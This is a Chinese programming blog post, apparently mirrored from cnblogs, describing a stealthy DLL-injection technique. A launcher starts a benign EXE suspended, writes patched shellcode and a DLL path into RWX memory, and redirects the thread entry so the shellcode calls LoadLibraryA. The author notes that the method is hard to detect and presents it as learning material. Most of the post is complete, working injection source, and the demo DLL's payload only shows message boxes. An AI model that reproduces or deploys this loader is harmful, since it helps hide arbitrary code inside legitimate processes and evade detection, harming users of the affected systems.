zoukankan      html  css  js  c++  java

  • EXE1调用EXE2来加载DLL实现隐藏功能

    这种方法不易察觉,其实还能做出很多其他的类型,这里只是学习··································

    Context.Eip = (DWORD)(((PSHELL_CODE)Buffer)->szInstruction);
改为
Context.Eax = (DWORD)(((PSHELL_CODE)Buffer)->szInstruction);
线程在ring3的第一行代码时,Eax存放的是线程函数起始地址
这个应该更稳妥的,主线程暂停在ntdll空间,由ntdll->EXE入口点 中间还干了事,
    学习于   http://bbs.pediy.com/showthread.php?t=159536
    自己修改了下结构········································


    主CPP   ExeOfShellcodeDllInject  代码:

    #include "stdafx.h"
#include <Windows.h>

typedef struct tempData 
{
	char szInjectDllPath[MAX_PATH];
	char szShllcode[MAX_PATH]; 
};

char ShellCode[] = {0x60,0x68,0x78,0x56,0x34,0x12,0xB8,0x78,0x56,0x34,0x12,0xFF,0xD0,0x61,0xE9,0x78,0x56,0x34,0x12};
//pushad
//push 0x12345678
//mov eax,0x12345678
//call eax
//popad
//jmp 0xXXXXXXXX

struct tempData  g_data = {0x0};
int _tmain(int argc, _TCHAR* argv[])
{
	//初始化结构体中的两个结构 DLL路径+shellcode
	 strcpy(g_data.szInjectDllPath,"shellcodeDLLInject.dll");
	 strcpy(g_data.szShllcode,ShellCode);
	
	char szExePath[] = "OrdinaryMsg.exe";
	//PathRemoveFileSpec(szExePath);
	STARTUPINFO si = {sizeof(si)};
	PROCESS_INFORMATION pi = {0};
	CONTEXT context;
	//生成暂停EXE去做事情
	if (!CreateProcess(szExePath,NULL,NULL,NULL,FALSE,CREATE_SUSPENDED,NULL,NULL,&si,&pi))
	{
		printf("找不到exe
");
		return 0;
	}
	//设置 CONTEXT_INTEGER 才能得到寄存器值
	context.ContextFlags = CONTEXT_INTEGER;

	GetThreadContext(pi.hThread,&context);

	

	LPVOID lpData = VirtualAllocEx(pi.hProcess,NULL,sizeof(g_data)+1,MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE);
	if (lpData == NULL)
	{
		printf("申请内存失败!
");
		return 0;
	}

	*(DWORD*)(g_data.szShllcode+0x2) = (DWORD)lpData;
	*(DWORD*)(g_data.szShllcode + 0x7) = (DWORD)LoadLibraryA;
	*(DWORD*)(g_data.szShllcode + 15) = (DWORD)(context.Eax - (DWORD)((char*)lpData + sizeof(MAX_PATH)+ 14) -5 );
	//这里面的14为  g_data.szShllcode 起始到最后一个需要修改处的长度

	
	if (!WriteProcessMemory(pi.hProcess,lpData,&g_data,sizeof(g_data),NULL))
	{
		printf("写入内存失败!
");
		return 0;
	}
	context.Eax = (DWORD)(((tempData*)lpData)->szShllcode);
	ResumeThread(pi.hThread);
		
	return 0;
}


    将    OrdinaryMsg.exe    shellcodeDLLInject.dll   和主EXE放在同一目录下可以运行成功
     OrdinaryMsg.exe 代码:

    #include "stdafx.h"
#include <Windows.h>

#pragma comment( linker, "/subsystem:windows /entry:mainCRTStartup" )  

int main(int argc, _TCHAR* argv[])
{
	//FreeConsole();
	MessageBox(NULL,"OrdinaryMsg","OrdinaryMsg",MB_OK);
	//AllocConsole();
	return 0;
}
    shellcodeDLLInject.dll  代码:

    #include "stdafx.h"

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
					 )
{
	switch (ul_reason_for_call)
	{
	case DLL_PROCESS_ATTACH:
		DisableThreadLibraryCalls(hModule);
		MessageBox(NULL,TEXT("DLL中非法操作"),TEXT("DLL中非法操作"),MB_OK);
		break;
	case DLL_PROCESS_DETACH:
		MessageBox(NULL,TEXT("DLL中非法操作完毕"),TEXT("DLL中非法操作完毕"),MB_OK);
		break;
	}
	return TRUE;
}

    最后效果为;
  • 相关阅读:
    install jqdatasdk
    分布式唯一ID自增(雪花算法)
    JVM内存布局及GC知识
    double涉及大数据的时候会变成科学计数法
    IDEA中的JUNIT测试
    spring boot 整合 swagger2
    springboot 报错nested exception is java.lang.IllegalStateException: Failed to check the status of the service xxxService No provider available for the service
    解决jar包依赖冲突(idea)
    IDEA中springboot的热部署
    Exception in thread "main" java.lang.AbstractMethodError: org.springframework.boot.context.config.ConfigFileApplicationListener.supportsSourceType(Ljava/lang/Class;)Z
  • 原文地址:https://www.cnblogs.com/zcc1414/p/3982399.html
Copyright © 2011-2022 走看看